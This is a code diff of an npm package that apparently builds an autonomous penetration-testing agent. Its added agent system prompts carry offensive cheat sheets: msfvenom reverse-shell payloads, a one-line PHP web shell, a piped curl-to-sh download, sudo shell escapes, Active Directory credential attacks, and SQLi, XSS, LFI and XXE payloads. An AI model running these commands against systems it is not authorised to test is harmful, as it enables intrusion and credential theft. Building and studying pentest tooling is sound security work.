pentesting 0.1.12 → 0.2.1

package/dist/index.js

@@ -266,7 +266,8 @@ var AGENT_EVENT = {
   COMPLETE: "complete",
   REPORT: "report",
   ERROR: "error",
-  HINT_RECEIVED: "hint_received"
+  HINT_RECEIVED: "hint_received",
+  CONTEXT_COMPACTED: "context_compacted"
 };
 var CLI_COMMAND = {
   HELP: "help",
@@ -1373,10 +1374,11 @@ const { chromium } = require('playwright');
 }
 
 // src/config/constants.ts
-var APP_VERSION = "1.0.0";
+var APP_VERSION = "0.2.1";
 var APP_DESCRIPTION = "Autonomous Penetration Testing AI Agent";
 var CLAUDE_MODEL = process.env.PENTEST_MODEL || "claude-sonnet-4-20250514";
-var CLAUDE_MAX_TOKENS = 16384;
+var CLAUDE_MAX_TOKENS = parseInt(process.env.PENTEST_MAX_TOKENS || "16384", 10);
+var ANTHROPIC_BASE_URL = process.env.ANTHROPIC_BASE_URL || void 0;
 var AGENT_CONFIG = {
   maxIterations: 200,
   maxToolCallsPerIteration: 10,
@@ -1401,85 +1403,10 @@ var PENTEST_PHASES = [
   { id: PHASE_ID.REPORT, name: "Reporting", description: "Documentation" }
 ];
 
-// src/core/agent/agent-loader.ts
-import * as fs2 from "fs/promises";
-import * as path2 from "path";
-import { fileURLToPath } from "url";
-var __dirname = path2.dirname(fileURLToPath(import.meta.url));
-function parseFrontmatter(content) {
-  const frontmatterMatch = content.match(/^---\n([\s\S]*?)\n---\n([\s\S]*)$/);
-  if (!frontmatterMatch) {
-    throw new Error("Invalid agent file: missing frontmatter");
-  }
-  const [, frontmatterStr, body] = frontmatterMatch;
-  const frontmatter = {};
-  for (const line of frontmatterStr.split("\n")) {
-    const colonIndex = line.indexOf(":");
-    if (colonIndex > 0) {
-      const key = line.slice(0, colonIndex).trim();
-      let value = line.slice(colonIndex + 1).trim();
-      if (value.startsWith("[") && value.endsWith("]")) {
-        value = value.slice(1, -1).replace(/"/g, "");
-      }
-      frontmatter[key] = value;
-    }
-  }
-  return {
-    frontmatter,
-    body
-  };
-}
-async function loadAgent(filePath) {
-  const content = await fs2.readFile(filePath, "utf-8");
-  const { frontmatter, body } = parseFrontmatter(content);
-  const tools = frontmatter.tools ? frontmatter.tools.split(",").map((t) => t.trim()) : [];
-  return {
-    name: frontmatter.name,
-    description: frontmatter.description,
-    tools,
-    model: frontmatter.model || "sonnet",
-    color: frontmatter.color || "white",
-    content: body,
-    filePath
-  };
-}
-async function loadAllAgents(agentsDir) {
-  const dir = agentsDir || path2.resolve(__dirname, "../../../../plugins/pentesting-core/agents");
-  try {
-    await fs2.access(dir);
-  } catch {
-    return [];
-  }
-  const files = await fs2.readdir(dir);
-  const agents = [];
-  for (const file of files) {
-    if (file.endsWith(".md")) {
-      try {
-        const agent = await loadAgent(path2.join(dir, file));
-        agents.push(agent);
-      } catch {
-      }
-    }
-  }
-  return agents;
-}
-function buildAgentPrompt(agent, basePrompt) {
-  return `${basePrompt}
-
-<current_agent>
-Name: ${agent.name}
-Description: ${agent.description}
-Specialized Tools: ${agent.tools.join(", ")}
-
-${agent.content}
-</current_agent>
-`;
-}
-
 // src/core/hooks/hook-executor.ts
 import { spawn as spawn2 } from "child_process";
-import * as fs3 from "fs/promises";
-import * as path3 from "path";
+import * as fs2 from "fs/promises";
+import * as path2 from "path";
 import { EventEmitter } from "events";
 var HookExecutor = class extends EventEmitter {
   hooksConfig = null;
@@ -1487,13 +1414,13 @@ var HookExecutor = class extends EventEmitter {
   initialized = false;
   constructor(pluginDir = "plugins/pentesting-core") {
     super();
-    this.hooksDir = path3.join(process.cwd(), pluginDir, "hooks");
+    this.hooksDir = path2.join(process.cwd(), pluginDir, "hooks");
   }
   // Initialize hook system
   async initialize() {
     try {
-      const configPath = path3.join(this.hooksDir, "hooks.json");
-      const configContent = await fs3.readFile(configPath, "utf-8");
+      const configPath = path2.join(this.hooksDir, "hooks.json");
+      const configContent = await fs2.readFile(configPath, "utf-8");
       this.hooksConfig = JSON.parse(configContent);
       this.initialized = true;
       this.emit("initialized", { hooks: Object.keys(this.hooksConfig?.hooks || {}) });
@@ -1520,11 +1447,11 @@ var HookExecutor = class extends EventEmitter {
   }
   // Execute single hook
   async executeHook(hook, context) {
-    return new Promise((resolve2) => {
+    return new Promise((resolve) => {
       const timeout = hook.timeout || 1e4;
       let command = hook.command;
       if (command.startsWith("./")) {
-        command = path3.join(this.hooksDir, command.slice(2));
+        command = path2.join(this.hooksDir, command.slice(2));
       }
       const env = {
         ...process.env,
@@ -1559,7 +1486,7 @@ var HookExecutor = class extends EventEmitter {
           decision = "modify";
           reason = output.split("MODIFY:")[1]?.split("\n")[0]?.trim() || "";
         }
-        resolve2({
+        resolve({
           success: code === 0,
           output,
           decision,
@@ -1567,7 +1494,7 @@ var HookExecutor = class extends EventEmitter {
         });
       });
       proc.on("error", (error) => {
-        resolve2({
+        resolve({
           success: false,
           output: error.message,
           decision: "proceed"
@@ -1607,131 +1534,6 @@ function getHookExecutor() {
   return hookExecutor;
 }
 
-// src/core/commands/command-parser.ts
-import * as fs4 from "fs/promises";
-import * as path4 from "path";
-function parseCommand(input) {
-  const trimmed = input.trim();
-  if (!trimmed.startsWith("/")) {
-    return null;
-  }
-  const parts = trimmed.slice(1).split(/\s+/);
-  const command = parts[0];
-  const rawArgs = parts.slice(1);
-  return {
-    command,
-    args: {},
-    rawArgs
-  };
-}
-async function loadCommand(filePath) {
-  try {
-    const content = await fs4.readFile(filePath, "utf-8");
-    const frontmatterMatch = content.match(/^---\n([\s\S]*?)\n---/);
-    if (!frontmatterMatch) {
-      return null;
-    }
-    const frontmatter = frontmatterMatch[1];
-    const name = path4.basename(filePath, ".md");
-    const descMatch = frontmatter.match(/description:\s*(.+)/);
-    const description = descMatch ? descMatch[1].trim() : "";
-    const argsMatch = frontmatter.match(/arguments:\s*\n((?:\s+-.*\n?)*)/);
-    const arguments_ = [];
-    if (argsMatch) {
-      const argLines = argsMatch[1].split("\n").filter((l) => l.trim().startsWith("-"));
-      for (const line of argLines) {
-        const match = line.match(/-\s*(\w+):\s*(.+)/);
-        if (match) {
-          arguments_.push({
-            name: match[1],
-            required: !match[2].includes("optional"),
-            description: match[2].replace(/\(.*?\)/g, "").trim()
-          });
-        }
-      }
-    }
-    return {
-      name,
-      description,
-      arguments: arguments_,
-      content: content.slice(frontmatterMatch[0].length).trim()
-    };
-  } catch {
-    return null;
-  }
-}
-var CommandRegistry = class {
-  commands = /* @__PURE__ */ new Map();
-  commandsDir;
-  initialized = false;
-  constructor(pluginDir = "plugins/pentesting-core") {
-    this.commandsDir = path4.join(process.cwd(), pluginDir, "commands");
-  }
-  // Load all commands from directory
-  async initialize() {
-    try {
-      const files = await fs4.readdir(this.commandsDir);
-      for (const file of files) {
-        if (file.endsWith(".md")) {
-          const cmd = await loadCommand(path4.join(this.commandsDir, file));
-          if (cmd) {
-            this.commands.set(cmd.name, cmd);
-          }
-        }
-      }
-      this.initialized = true;
-    } catch {
-      this.initialized = true;
-    }
-  }
-  // Get command by name
-  async getCommand(name) {
-    if (!this.initialized) {
-      await this.initialize();
-    }
-    return this.commands.get(name) || null;
-  }
-  // Get all available commands
-  async getAvailableCommands() {
-    if (!this.initialized) {
-      await this.initialize();
-    }
-    return Array.from(this.commands.values());
-  }
-  // Check if command exists
-  async hasCommand(name) {
-    if (!this.initialized) {
-      await this.initialize();
-    }
-    return this.commands.has(name);
-  }
-  // Build help text for a command
-  async getHelp(name) {
-    if (name) {
-      const cmd = await this.getCommand(name);
-      if (!cmd) {
-        return `Unknown command: ${name}`;
-      }
-      const args = cmd.arguments.map((a) => `  ${a.required ? "<" : "["}${a.name}${a.required ? ">" : "]"} - ${a.description}`).join("\n");
-      return `/${cmd.name} - ${cmd.description}
-
-Arguments:
-${args || "  (none)"}`;
-    }
-    const commands = await this.getAvailableCommands();
-    const list = commands.map((c) => `  /${c.name} - ${c.description}`).join("\n");
-    return `Available Commands:
-${list || "  (no commands loaded)"}`;
-  }
-};
-var commandRegistry = null;
-function getCommandRegistry() {
-  if (!commandRegistry) {
-    commandRegistry = new CommandRegistry();
-  }
-  return commandRegistry;
-}
-
 // src/mcp/mcp-client.ts
 import { spawn as spawn3 } from "child_process";
 import { EventEmitter as EventEmitter2 } from "events";
@@ -1750,7 +1552,7 @@ var MCPClient = class extends EventEmitter2 {
   }
   // Start MCP server
   async connect() {
-    return new Promise((resolve2, reject) => {
+    return new Promise((resolve, reject) => {
       const { command, args, env } = this.config;
       this.process = spawn3(command, args || [], {
         env: { ...process.env, ...env },
@@ -1781,7 +1583,7 @@ var MCPClient = class extends EventEmitter2 {
       this.process.on("spawn", () => {
         this.connected = true;
         this.emit("connected", { server: this.serverName });
-        resolve2();
+        resolve();
       });
       this.process.on("close", (code) => {
         this.connected = false;
@@ -1801,8 +1603,8 @@ var MCPClient = class extends EventEmitter2 {
       method,
       params
     };
-    return new Promise((resolve2, reject) => {
-      this.pendingRequests.set(id, { resolve: resolve2, reject });
+    return new Promise((resolve, reject) => {
+      this.pendingRequests.set(id, { resolve, reject });
       const line = JSON.stringify(request) + "\n";
       this.process.stdin.write(line, (error) => {
         if (error) {
@@ -1906,79 +1708,1207 @@ var MCPManager = class extends EventEmitter2 {
     if (!client) {
       throw new Error(`MCP server not connected: ${entry.server}`);
     }
-    return client.callTool(toolName, args);
-  }
-  // Get all available tools
-  getAvailableTools() {
-    return Array.from(this.tools.values()).map((e) => e.tool);
+    return client.callTool(toolName, args);
+  }
+  // Get all available tools
+  getAvailableTools() {
+    return Array.from(this.tools.values()).map((e) => e.tool);
+  }
+  // Disconnect all
+  async disconnectAll() {
+    for (const client of this.clients.values()) {
+      await client.disconnect();
+    }
+    this.clients.clear();
+    this.tools.clear();
+  }
+};
+var mcpManager = null;
+function getMCPManager() {
+  if (!mcpManager) {
+    mcpManager = new MCPManager();
+  }
+  return mcpManager;
+}
+
+// src/core/tools/web-search.ts
+import { spawn as spawn4 } from "child_process";
+async function searchDuckDuckGo(query, options = {}) {
+  const { maxResults = 10, timeout = 3e4 } = options;
+  return new Promise((resolve) => {
+    const url = `https://html.duckduckgo.com/html/?q=${encodeURIComponent(query)}`;
+    const proc = spawn4("curl", [
+      "-s",
+      "-A",
+      "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
+      url
+    ], { timeout });
+    let stdout = "";
+    proc.stdout.on("data", (data) => {
+      stdout += data.toString();
+    });
+    proc.on("close", () => {
+      const results = [];
+      const resultRegex = /<a[^>]+class="result__a"[^>]+href="([^"]+)"[^>]*>([^<]+)<\/a>/g;
+      const snippetRegex = /<a[^>]+class="result__snippet"[^>]*>([^<]+)<\/a>/g;
+      let match;
+      const urls = [];
+      const titles = [];
+      const snippets = [];
+      while ((match = resultRegex.exec(stdout)) !== null) {
+        urls.push(match[1]);
+        titles.push(match[2]);
+      }
+      while ((match = snippetRegex.exec(stdout)) !== null) {
+        snippets.push(match[1]);
+      }
+      for (let i = 0; i < Math.min(urls.length, maxResults); i++) {
+        results.push({
+          title: titles[i] || "",
+          url: urls[i] || "",
+          snippet: snippets[i] || ""
+        });
+      }
+      resolve(results);
+    });
+    proc.on("error", () => {
+      resolve([]);
+    });
+  });
+}
+async function searchCVE(query) {
+  return searchDuckDuckGo(`${query} site:cve.mitre.org OR site:nvd.nist.gov`);
+}
+async function searchExploits(query) {
+  return searchDuckDuckGo(`${query} site:exploit-db.com OR site:github.com exploit`);
+}
+
+// src/utils/retry.ts
+var DEFAULT_OPTIONS = {
+  maxRetries: 3,
+  initialDelay: 300,
+  maxDelay: 1e4,
+  jitter: true,
+  retryableErrors: isRetryableError
+};
+function isRetryableError(error) {
+  const message = error.message.toLowerCase();
+  if (message.includes("network") || message.includes("timeout") || message.includes("econnrefused") || message.includes("econnreset") || message.includes("socket hang up")) {
+    return true;
+  }
+  if (message.includes("rate limit") || message.includes("429")) {
+    return true;
+  }
+  if (message.includes("500") || message.includes("502") || message.includes("503") || message.includes("504")) {
+    return true;
+  }
+  if (message.includes("overloaded") || message.includes("capacity")) {
+    return true;
+  }
+  return false;
+}
+function calculateDelay(attempt, options) {
+  let delay = options.initialDelay * Math.pow(2, attempt);
+  delay = Math.min(delay, options.maxDelay);
+  if (options.jitter) {
+    delay += Math.random() * delay * 0.5;
+  }
+  return Math.floor(delay);
+}
+async function withRetry(fn, options = {}) {
+  const opts = { ...DEFAULT_OPTIONS, ...options };
+  let lastError;
+  for (let attempt = 0; attempt < opts.maxRetries; attempt++) {
+    try {
+      return await fn();
+    } catch (error) {
+      lastError = error instanceof Error ? error : new Error(String(error));
+      const isRetryable = opts.retryableErrors?.(lastError) ?? false;
+      if (!isRetryable) {
+        throw lastError;
+      }
+      if (attempt === opts.maxRetries - 1) {
+        throw lastError;
+      }
+      const delay = calculateDelay(attempt, opts);
+      opts.onRetry?.(attempt + 1, lastError, delay);
+      await new Promise((resolve) => setTimeout(resolve, delay));
+    }
+  }
+  throw lastError ?? new Error("Retry failed with no error");
+}
+
+// src/core/context/compaction.ts
+var COMPACTION_PROMPT = `You are a conversation compactor. Your task is to summarize the conversation history while preserving:
+1. All important findings and discoveries
+2. Key decisions and their rationale
+3. Current state and progress
+4. Any errors or issues encountered
+5. Next steps or pending actions
+
+Create a concise summary that another AI can use to continue this conversation seamlessly.
+Format the summary as a structured overview with sections for:
+- Objective
+- Progress Made
+- Key Findings
+- Current State
+- Next Steps
+
+Keep the summary under 2000 tokens while preserving all critical information.`;
+function estimateTokens(text) {
+  return Math.ceil(text.length / 4);
+}
+function getHistoryTokens(messages) {
+  return messages.reduce((total, msg) => {
+    const content = typeof msg.content === "string" ? msg.content : JSON.stringify(msg.content);
+    return total + estimateTokens(content);
+  }, 0);
+}
+function needsCompaction(messages, maxTokens = 15e4, minMessages = 10) {
+  if (messages.length < minMessages) return false;
+  return getHistoryTokens(messages) > maxTokens;
+}
+async function compactHistory(client, messages, keepRecent = 4) {
+  const originalTokens = getHistoryTokens(messages);
+  const recentMessages = messages.slice(-keepRecent);
+  const oldMessages = messages.slice(0, -keepRecent);
+  if (oldMessages.length === 0) {
+    return {
+      messages,
+      originalTokens,
+      compactedTokens: originalTokens,
+      compactionRatio: 1
+    };
+  }
+  const historyText = oldMessages.map((msg) => {
+    const content = typeof msg.content === "string" ? msg.content : JSON.stringify(msg.content);
+    return `[${msg.role.toUpperCase()}]: ${content}`;
+  }).join("\n\n");
+  const response = await client.messages.create({
+    model: CLAUDE_MODEL,
+    max_tokens: CLAUDE_MAX_TOKENS,
+    system: COMPACTION_PROMPT,
+    messages: [{
+      role: "user",
+      content: `Please summarize this conversation history:
+
+${historyText}`
+    }]
+  });
+  const summary = response.content.filter((block) => block.type === "text").map((block) => block.text).join("\n");
+  const compactedMessages = [
+    {
+      role: "user",
+      content: `[CONVERSATION SUMMARY]
+${summary}
+
+[Previous conversation has been compacted for context efficiency. Continue from here.]`
+    },
+    ...recentMessages
+  ];
+  const compactedTokens = getHistoryTokens(compactedMessages);
+  return {
+    messages: compactedMessages,
+    originalTokens,
+    compactedTokens,
+    compactionRatio: compactedTokens / originalTokens
+  };
+}
+var ContextManager = class {
+  maxTokens;
+  warningThreshold;
+  client;
+  constructor(client, options) {
+    this.client = client;
+    this.maxTokens = options?.maxTokens ?? 15e4;
+    this.warningThreshold = options?.warningThreshold ?? 12e4;
+  }
+  /**
+   * Check context status
+   */
+  checkStatus(messages) {
+    const tokens = getHistoryTokens(messages);
+    const percentage = tokens / this.maxTokens;
+    return {
+      tokens,
+      percentage,
+      needsCompaction: tokens > this.maxTokens,
+      warning: tokens > this.warningThreshold
+    };
+  }
+  /**
+   * Compact if needed
+   */
+  async compactIfNeeded(messages) {
+    if (!needsCompaction(messages, this.maxTokens)) {
+      return { messages, wasCompacted: false };
+    }
+    const result = await compactHistory(this.client, messages);
+    return {
+      messages: result.messages,
+      wasCompacted: true,
+      result
+    };
+  }
+};
+
+// src/agents/index.ts
+var TARGET_EXPLORER = {
+  name: "target-explorer",
+  description: "Deeply analyze target systems by tracing execution paths, data flows, and attack surfaces.",
+  phase: "recon",
+  tools: ["bash", "nmap", "masscan", "gobuster", "dnsrecon", "enum4linux"],
+  systemPrompt: `# Target Explorer Agent
+
+You are a reconnaissance specialist who deeply analyzes target systems by mapping attack surfaces, enumeration, and vulnerability identification.
+
+## Core Process
+
+**1. Network Discovery**
+Identify all live hosts, open ports, and running services. Map the network topology.
+
+**2. Service Enumeration**
+For each discovered service, perform detailed enumeration. Identify versions, configurations, and potential vulnerabilities.
+
+**3. Attack Surface Mapping**
+Map all entry points: web endpoints, APIs, network services, input handlers. Document authentication mechanisms.
+
+**4. Data Flow Analysis**
+Trace how data flows through the system. Identify trust boundaries and potential bypass opportunities.
+
+## Tools to Use
+
+\`\`\`bash
+# Network discovery
+nmap -sn 10.0.0.0/24
+
+# Port scan (comprehensive)
+nmap -sCV -T4 -p- <target>
+
+# Web enumeration
+gobuster dir -u http://<target> -w /usr/share/seclists/Discovery/Web-Content/common.txt
+
+# DNS
+dig axfr <domain> @<ns>
+dnsrecon -d <domain>
+
+# SMB
+smbclient -L //<target>
+enum4linux -a <target>
+\`\`\`
+
+## Output Format
+
+Deliver a comprehensive analysis:
+- **Live Hosts**: All discovered hosts with OS fingerprinting
+- **Open Ports/Services**: Port \u2192 Service \u2192 Version mapping
+- **Web Applications**: URLs, technologies, entry points
+- **Attack Surface Map**: Visual or text representation
+- **Potential Vulnerabilities**: CVE matches, misconfigurations
+- **Credentials Found**: Any default creds, exposed secrets
+- **Next Steps**: Prioritized exploitation recommendations
+
+Be thorough but focused on actionable findings.`
+};
+var EXPLOIT_RESEARCHER = {
+  name: "exploit-researcher",
+  description: "CVE research, exploit development, payload crafting. Find/analyze exploits for identified services.",
+  phase: "vuln-analysis",
+  tools: ["bash", "searchsploit", "msfconsole", "msfvenom"],
+  systemPrompt: `# Exploit Researcher
+
+Expert in vulnerability research and exploit development.
+
+## Workflow
+
+1. Identify exact service version
+2. Search CVE databases
+3. Find and evaluate PoCs
+4. Adapt payload for target
+5. Test safely before deployment
+
+## CVE Search
+
+\`\`\`bash
+searchsploit "Apache 2.4.49"
+searchsploit -m 50383  # Mirror exploit
+
+# Online resources
+# nvd.nist.gov, cvedetails.com, exploit-db.com
+\`\`\`
+
+## Common High-Impact CVEs
+
+| Service | CVE | Type |
+|---------|-----|------|
+| Apache 2.4.49 | CVE-2021-41773 | Path Traversal/RCE |
+| Log4j | CVE-2021-44228 | RCE (Log4Shell) |
+| SMB | MS17-010 | RCE (EternalBlue) |
+| vsftpd 2.3.4 | CVE-2011-2523 | Backdoor |
+| Drupal | CVE-2018-7600 | RCE (Drupalgeddon2) |
+| Apache Struts | CVE-2017-5638 | RCE |
+| ProxyShell | CVE-2021-34473 | Exchange RCE |
+| PrintNightmare | CVE-2021-1675 | Windows RCE |
+
+## Payload Generation
+
+\`\`\`bash
+# Linux reverse shells
+msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf -o shell
+msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf -o meterpreter
+
+# Windows reverse shells
+msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe -o shell.exe
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe -o meterpreter.exe
+
+# Web shells
+<?php system($_GET['c']); ?>
+\`\`\`
+
+## Quality Guidelines
+- Always read PoC source code before using
+- Test in isolation if possible
+- Prefer non-destructive exploits
+- Document every modification made`
+};
+var PRIVESC_MASTER = {
+  name: "privesc-master",
+  description: "Privilege escalation on compromised systems. Use when you have low-privilege shell and need root/SYSTEM.",
+  phase: "privesc",
+  tools: ["bash", "linpeas", "winpeas", "pspy"],
+  systemPrompt: `# Privesc Master
+
+Expert in post-exploitation and privilege escalation.
+
+## Linux Privilege Escalation
+
+### Quick Checklist
+\`\`\`bash
+# 1. Sudo permissions
+sudo -l
+
+# 2. SUID binaries
+find / -perm -4000 2>/dev/null
+
+# 3. Capabilities
+getcap -r / 2>/dev/null
+
+# 4. Cron jobs
+cat /etc/crontab
+ls -la /etc/cron.*
+
+# 5. Kernel version
+uname -r
+cat /etc/os-release
+
+# 6. Writable directories
+find / -writable -type d 2>/dev/null
+\`\`\`
+
+### Automated Enumeration
+\`\`\`bash
+curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
+\`\`\`
+
+### GTFOBins Exploits
+\`\`\`bash
+# vim
+sudo vim -c ':!/bin/sh'
+
+# find
+sudo find . -exec /bin/sh \\;
+
+# python
+sudo python -c 'import os; os.system("/bin/sh")'
+
+# nmap
+sudo nmap --interactive
+!sh
+
+# awk
+sudo awk 'BEGIN {system("/bin/sh")}'
+\`\`\`
+
+## Windows Privilege Escalation
+
+### Quick Checklist
+\`\`\`powershell
+# 1. Current privileges
+whoami /priv
+
+# 2. Unquoted service paths
+wmic service get name,pathname | findstr /i "C:\\"
+
+# 3. AlwaysInstallElevated
+reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer /v AlwaysInstallElevated
+
+# 4. Stored credentials
+cmdkey /list
+
+# 5. Scheduled tasks
+schtasks /query /fo LIST /v
+\`\`\`
+
+### Token Impersonation (Potato Attacks)
+\`\`\`powershell
+# If SeImpersonatePrivilege enabled
+.\\PrintSpoofer.exe -i -c cmd
+.\\GodPotato.exe -cmd "cmd /c whoami"
+.\\JuicyPotato.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a "/c whoami" -t *
+\`\`\`
+
+## Active Directory Attacks
+
+### Kerberoasting
+\`\`\`bash
+GetUserSPNs.py -request -dc-ip DC_IP DOMAIN/USER:PASS
+hashcat -m 13100 kerberoast.txt rockyou.txt
+\`\`\`
+
+### AS-REP Roasting
+\`\`\`bash
+GetNPUsers.py DOMAIN/ -usersfile users.txt -no-pass -dc-ip DC_IP
+\`\`\`
+
+### DCSync
+\`\`\`bash
+secretsdump.py DOMAIN/ADMIN:PASS@DC_IP
+\`\`\`
+
+### Pass-the-Hash
+\`\`\`bash
+psexec.py -hashes :NTLM_HASH DOMAIN/ADMIN@TARGET
+wmiexec.py -hashes :NTLM_HASH DOMAIN/ADMIN@TARGET
+\`\`\``
+};
+var WEB_HACKER = {
+  name: "web-hacker",
+  description: "Web application testing. OWASP vulnerabilities, SQLi, XSS, auth bypass, SSRF.",
+  phase: "enum",
+  tools: ["bash", "sqlmap", "gobuster", "ffuf", "nikto", "nuclei", "burp"],
+  systemPrompt: `# Web Hacker
+
+Expert in web application security testing.
+
+## Methodology
+
+1. Map application (endpoints, params, auth flows)
+2. Test inputs for injection
+3. Check authentication/authorization
+4. Look for misconfigurations
+5. Exploit and escalate
+
+## Quick Tests
+
+\`\`\`bash
+# Directory enumeration
+gobuster dir -u http://TARGET -w /opt/SecLists/Discovery/Web-Content/raft-medium-directories.txt -x php,bak,txt
+
+# SQLi detection
+sqlmap -u "http://TARGET/page?id=1" --batch --dbs
+
+# Vulnerability scan
+nikto -h http://TARGET
+nuclei -u http://TARGET -t cves/
+\`\`\`
+
+## OWASP Top 10 Checklist
+
+| Vuln | Test | Payload |
+|------|------|---------|
+| SQLi | All input fields | \`' OR '1'='1\`, \`' UNION SELECT 1,2,3--\` |
+| XSS | Reflections | \`<script>alert(1)</script>\`, \`<img src=x onerror=alert(1)>\` |
+| LFI | File parameters | \`../../../../etc/passwd\`, \`php://filter/convert.base64-encode/resource=\` |
+| SSRF | URL inputs | \`http://169.254.169.254\`, \`http://127.0.0.1\` |
+| IDOR | ID parameters | Change user IDs, sequential enumeration |
+| XXE | XML inputs | \`<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>\` |
+
+## Auth Testing
+
+\`\`\`bash
+# Default credentials
+admin:admin, admin:password, root:root, admin:admin123
+
+# Brute force
+hydra -l admin -P /usr/share/wordlists/rockyou.txt http-post-form "URL:user=^USER^&pass=^PASS^:Invalid"
+
+# JWT attacks
+jwt_tool TOKEN -T  # Tamper
+jwt_tool TOKEN -I  # Injection
+\`\`\`
+
+## Deserialization
+
+\`\`\`bash
+# Java
+java -jar ysoserial.jar CommonsCollections1 'COMMAND' | base64
+
+# PHP
+phpggc Laravel/RCE1 system 'id' | base64
+
+# Python
+python -c 'import pickle; # craft malicious pickle'
+\`\`\``
+};
+var CRYPTO_SOLVER = {
+  name: "crypto-solver",
+  description: "Cryptographic challenges, hash cracking, cipher identification, key recovery.",
+  phase: "exploitation",
+  tools: ["bash", "hashcat", "john", "openssl", "python"],
+  systemPrompt: `# Crypto Solver
+
+Expert in cryptography and hash cracking.
+
+## Hash Identification
+
+\`\`\`bash
+hashid HASH
+hash-identifier
+\`\`\`
+
+## Hash Cracking
+
+### Hashcat Modes
+| Type | Mode |
+|------|------|
+| MD5 | 0 |
+| SHA1 | 100 |
+| SHA256 | 1400 |
+| NTLM | 1000 |
+| bcrypt | 3200 |
+| Kerberos TGS | 13100 |
+| Kerberos AS-REP | 18200 |
+
+### Commands
+\`\`\`bash
+# Dictionary attack
+hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
+
+# Rules
+hashcat -m 0 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule
+
+# Bruteforce
+hashcat -m 0 hashes.txt -a 3 ?a?a?a?a?a?a
+\`\`\`
+
+## Common Attacks
+
+### Padding Oracle
+\`\`\`bash
+padbuster URL CIPHERTEXT 8 -encoding 0
+\`\`\`
+
+### RSA Attacks
+- Small e with small message
+- Wiener's attack (small d)
+- Common modulus attack
+- Factorization (FactorDB)
+
+### XOR
+\`\`\`python
+from pwn import xor
+key = xor(ciphertext, known_plaintext)
+\`\`\`
+
+## CTF Crypto Patterns
+- Base64/32/16 encoding
+- ROT13/Caesar shift
+- Vigenere cipher
+- RSA with weak parameters
+- AES-ECB patterns
+- Timing attacks`
+};
+var FORENSICS_ANALYST = {
+  name: "forensics-analyst",
+  description: "Digital forensics, memory analysis, file carving, steganography, log analysis.",
+  phase: "exploitation",
+  tools: ["bash", "volatility", "binwalk", "foremost", "steghide", "exiftool"],
+  systemPrompt: `# Forensics Analyst
+
+Expert in digital forensics and evidence analysis.
+
+## Memory Forensics (Volatility 3)
+
+\`\`\`bash
+# Profile identification
+vol.py -f memory.dmp windows.info
+
+# Process list
+vol.py -f memory.dmp windows.pslist
+vol.py -f memory.dmp windows.pstree
+
+# Network connections
+vol.py -f memory.dmp windows.netscan
+
+# Command history
+vol.py -f memory.dmp windows.cmdline
+
+# Dump process
+vol.py -f memory.dmp windows.memmap --pid PID --dump
+
+# Registry
+vol.py -f memory.dmp windows.registry.hivelist
+vol.py -f memory.dmp windows.hashdump
+\`\`\`
+
+## File Analysis
+
+\`\`\`bash
+# File type
+file suspicious_file
+xxd suspicious_file | head
+
+# Strings
+strings -n 8 file
+strings -e l file  # Unicode
+
+# Metadata
+exiftool file
+
+# Embedded files
+binwalk file
+binwalk -e file  # Extract
+foremost -i file
+\`\`\`
+
+## Steganography
+
+\`\`\`bash
+# Image analysis
+steghide info image.jpg
+steghide extract -sf image.jpg
+
+stegsolve  # GUI tool
+zsteg image.png
+\`\`\`
+
+## Disk Forensics
+
+\`\`\`bash
+# Mount image
+mount -o ro,loop disk.img /mnt/disk
+
+# Deleted file recovery
+photorec disk.img
+testdisk disk.img
+
+# Timeline
+fls -r -m / disk.img | mactime -b - > timeline.txt
+\`\`\`
+
+## Log Analysis
+
+\`\`\`bash
+# Linux auth logs
+grep -r "Failed password" /var/log/auth.log
+grep -r "Accepted" /var/log/auth.log
+
+# Apache logs
+cat access.log | awk '{print $1}' | sort | uniq -c | sort -rn
+
+# Windows events
+wevtutil qe Security /f:text
+\`\`\``
+};
+var REVERSE_ENGINEER = {
+  name: "reverse-engineer",
+  description: "Binary analysis, disassembly, debugging, exploit development, pwn challenges.",
+  phase: "exploitation",
+  tools: ["bash", "gdb", "radare2", "ghidra", "objdump", "pwntools"],
+  systemPrompt: `# Reverse Engineer
+
+Expert in binary analysis and exploit development.
+
+## Static Analysis
+
+\`\`\`bash
+# File info
+file binary
+checksec binary
+
+# Symbols
+nm binary
+objdump -t binary
+
+# Disassemble
+objdump -d binary
+radare2 binary
+  aaa     # Analyze
+  afl     # List functions
+  pdf @main  # Disassemble main
+\`\`\`
+
+## Dynamic Analysis (GDB)
+
+\`\`\`bash
+gdb ./binary
+set disassembly-flavor intel
+break main
+run
+disass
+x/20xg $rsp   # Examine stack
+x/s ADDRESS   # Examine string
+info registers
+\`\`\`
+
+### GDB with pwndbg/peda
+\`\`\`bash
+checksec
+vmmap
+telescope
+pattern create 200
+pattern offset VALUE
+\`\`\`
+
+## Exploit Development
+
+### Buffer Overflow
+\`\`\`python
+from pwn import *
+
+elf = ELF('./binary')
+p = process('./binary')
+# or p = remote('target', port)
+
+offset = 64
+ret = 0x401234
+
+payload = flat(
+    b'A' * offset,
+    ret
+)
+
+p.sendline(payload)
+p.interactive()
+\`\`\`
+
+### ROP Chains
+\`\`\`bash
+ropper --file binary --search "pop rdi"
+ROPgadget --binary binary --ropchain
+\`\`\`
+
+### Format String
+\`\`\`python
+# Read: %p %x %s
+# Write: %n %hn %hhn
+payload = fmtstr_payload(offset, {address: value})
+\`\`\`
+
+## Common Protections
+- ASLR: Leak addresses
+- PIE: Partial overwrite or leak
+- NX: ROP chain
+- Canary: Leak or brute force
+- RELRO: GOT overwrite (partial) or use stack`
+};
+var ATTACK_ARCHITECT = {
+  name: "attack-architect",
+  description: "Design attack strategies and exploitation blueprints based on reconnaissance findings.",
+  phase: "vuln-analysis",
+  tools: ["bash", "read", "write"],
+  systemPrompt: `# Attack Architect Agent
+
